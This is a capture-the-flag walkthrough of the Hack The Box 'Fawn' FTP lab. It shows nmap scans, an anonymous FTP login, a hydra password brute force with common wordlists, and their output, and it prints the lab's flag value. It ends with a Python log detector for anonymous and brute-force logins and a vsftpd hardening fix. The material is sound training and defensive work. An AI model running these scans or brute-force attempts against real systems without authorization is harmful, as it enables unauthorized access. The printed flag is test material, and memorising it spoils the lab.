02.FAWN (FTP)

OVERVIEW

Target Service:                   FTP
Attack:                           Brute Force
Vulnerability:                    Authentication Vulnerability – Weak Credentials
MITRE Tactics & Techniques:       TA0001: Initial Access
                                   - T1078: Valid Accounts
                                  TA0006: Credential Access
                                   - T1110.001: Brute Force – Password Guessing

Summary: The target system exposed an FTP service with no authentication hardening, 
         allowing access via default or easily guessable credentials. A brute-force 
         attempt using common username-password combinations succeeded, revealing a 
         serious authentication misconfiguration.

CONNECT TO THE LAB VPN

root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn

ENUMERATE SERVICES

root@htb:~$ nmap -sV -T4 10.129.188.72 -p-
 PORT     STATE SERVICE       VERSION
 21/tcp   open  ftp           vsftpd 3.0.3

VULNERABILITY SCANNING

root@htb:~$ nmap -sV -sC -T4 10.129.188.72 -p 21
 PORT   STATE SERVICE VERSION
 21/tcp open  ftp     vsftpd 3.0.3
 | ftp-syst: 
 |   STAT: 
 | FTP server status:
 |      Connected to ::ffff:10.10.14.16
 |      Logged in as ftp
 |      TYPE: ASCII
 |      No session bandwidth limit
 |      Session timeout in seconds is 300
 |      Control connection is plain text
 |      Data connections will be plain text
 |      At session startup, client count was 5
 |      vsFTPd 3.0.3 - secure, fast, stable
 |_End of status
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 |_-rw-r--r--    1 0        0              32 Jun 04  2021 flag.txt
 Service Info: OS: Unix

 * the -sC flag runs the default set of Nmap scripts (NSE scripts), which typically include
   scripts for service enumeration, version detection, and other basic checks.
   
root@htb:~$ sudo nmap --script=vuln 10.129.188.72 -p 21
 * --script=vuln runs only the scripts in the "vuln" category, which check for known
   vulnerabilities in the service running on port 21
    - e.g., weak FTP configurations, or known vulnerabilities in the FTP service
       - if no results are found the service may be patched, but a clean run only means
         none of the vuln-category NSE scripts matched; it is not proof of a patched service

FOOTHOLD/COMPROMISE

Submit root flag

#ANONYMOUS LOGIN METHOD

root@htb:~$ ftp 10.129.188.72
Name (10.129.188.72:root): anonymous
ftp> help

 * the get command downloads a file from the FTP server to the local working directory

ftp> ls
 229 Entering Extended Passive Mode (|||8196|)
 150 Here comes the directory listing.
 -rw-r--r--    1 0        0              32 Jun 04  2021 flag.txt
 226 Directory send OK.

 * anonymous login is configured on the ftp server
    - the anonymous username accepts ANY password given to it!

ftp> get flag.txt
 local: flag.txt remote: flag.txt
 229 Entering Extended Passive Mode (|||59553|)
 150 Opening BINARY mode data connection for flag.txt (32 bytes).
 100% |*************************************************************************************************************************************************|    32      108.88 KiB/s    00:00 ETA
 226 Transfer complete.
 32 bytes received in 00:00 (3.46 KiB/s)

ftp> exit

root@htb:~$ cat flag.txt
 * 035db21c881520061c53e0536e44f815

#BRUTE FORCE METHOD

root@htb:~$ locate username
 /usr/share/seclists/Usernames/top-usernames-shortlist.txt
root@htb:~$ cp /usr/share/seclists/Usernames/top-usernames-shortlist.txt .

root@htb:~$ locate password
 /usr/share/seclists/Passwords/Common-Credentials/top-passwords-shortlist.txt
root@htb:~$ cp /usr/share/seclists/Passwords/Common-Credentials/top-passwords-shortlist.txt .

root@htb:~$ hydra -L top-usernames-shortlist.txt -P top-passwords-shortlist.txt 10.129.188.72 ftp
 [21][ftp] host: 10.129.188.72   login: ftp   password: password
 [21][ftp] host: 10.129.188.72   login: ftp   password: 123456
 [21][ftp] host: 10.129.188.72   login: ftp   password: abc123
 [21][ftp] host: 10.129.188.72   login: ftp   password: querty
 [21][ftp] host: 10.129.188.72   login: ftp   password: 12345678
 [21][ftp] host: 10.129.188.72   login: ftp   password: monkey
 [STATUS] 313.00 tries/min, 313 tries in 00:01h, 112 to do in 00:01h, 16 active
 1 of 1 target successfully completed, 6 valid passwords found

root@htb:~$ ftp 10.129.188.72
Name (10.129.188.72:root): ftp
 331 Please specify the password.
Password:  password

ftp> ls
 229 Entering Extended Passive Mode (|||8196|)
 150 Here comes the directory listing.
 -rw-r--r--    1 0        0              32 Jun 04  2021 flag.txt
 226 Directory send OK.

 * hydra reported 6 "valid" passwords for the ftp user because ftp is vsftpd's anonymous
   account, which accepts ANY password given to it; the brute force only rediscovered the
   anonymous login found in the scan above

ftp> get flag.txt
 local: flag.txt remote: flag.txt
 229 Entering Extended Passive Mode (|||59553|)
 150 Opening BINARY mode data connection for flag.txt (32 bytes).
 100% |*************************************************************************************************************************************************|    32      108.88 KiB/s    00:00 ETA
 226 Transfer complete.
 32 bytes received in 00:00 (3.46 KiB/s)

ftp> exit

root@htb:~$ cat flag.txt
 * 035db21c881520061c53e0536e44f815
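Detection side of both methods above, as an added example that is not part of the original write-up: a small Python checker over vsftpd-style log lines (the sample lines are constructed, not taken from the target) that flags anonymous logins, which vsftpd records with "anon password", and the burst of FAIL LOGIN entries a hydra run at ~300 tries/min leaves behind.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in vsftpd's default log-line format (not taken from the walkthrough).
SAMPLE_LOG = """\
Fri Jun  4 10:00:01 2021 [pid 1199] [anonymous] OK LOGIN: Client "10.10.14.16", anon password "?"
Fri Jun  4 10:05:00 2021 [pid 1210] [root] FAIL LOGIN: Client "10.10.14.16"
Fri Jun  4 10:05:00 2021 [pid 1211] [admin] FAIL LOGIN: Client "10.10.14.16"
Fri Jun  4 10:05:01 2021 [pid 1212] [test] FAIL LOGIN: Client "10.10.14.16"
Fri Jun  4 10:05:01 2021 [pid 1213] [guest] FAIL LOGIN: Client "10.10.14.16"
Fri Jun  4 10:05:02 2021 [pid 1214] [ftp] OK LOGIN: Client "10.10.14.16", anon password "password"
Fri Jun  4 10:30:00 2021 [pid 1300] [alice] FAIL LOGIN: Client "10.10.14.99"
Fri Jun  4 10:30:40 2021 [pid 1301] [alice] OK LOGIN: Client "10.10.14.99"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3}\s+\d{1,2} \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'(?:\[(?P<user>[^\]]*)\] )?(?P<event>CONNECT|OK LOGIN|FAIL LOGIN): '
    r'Client "(?P<ip>[^"]+)"(?P<rest>.*)$')

def parse(text):
    """Yield (timestamp, user, event, client_ip, rest) for every line that matches."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(" ".join(m["ts"].split()), "%a %b %d %H:%M:%S %Y")
            yield ts, m["user"], m["event"], m["ip"], m["rest"]

def detect(text, threshold=4, window_s=60):
    """Return alerts for anonymous logins and for any client with >= threshold
    FAIL LOGIN entries inside a window_s-second sliding window."""
    alerts = []
    fails = defaultdict(list)
    for ts, user, event, ip, rest in parse(text):
        if event == "OK LOGIN" and "anon password" in rest:
            alerts.append(("anonymous-login", ip, user))
        elif event == "FAIL LOGIN":
            fails[ip].append(ts)
    for ip, stamps in fails.items():
        stamps.sort()
        start = 0                       # sliding window over sorted failure times
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > timedelta(seconds=window_s):
                start += 1
            if end - start + 1 >= threshold:
                alerts.append(("brute-force", ip, end - start + 1))
                break                   # one alert per client is enough
    return alerts
```

On the server the fix is anonymous_enable=NO in vsftpd.conf (a standard vsftpd directive) plus a rate limiter such as fail2ban reading the same log; the checker above only tells you the setting was left on.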
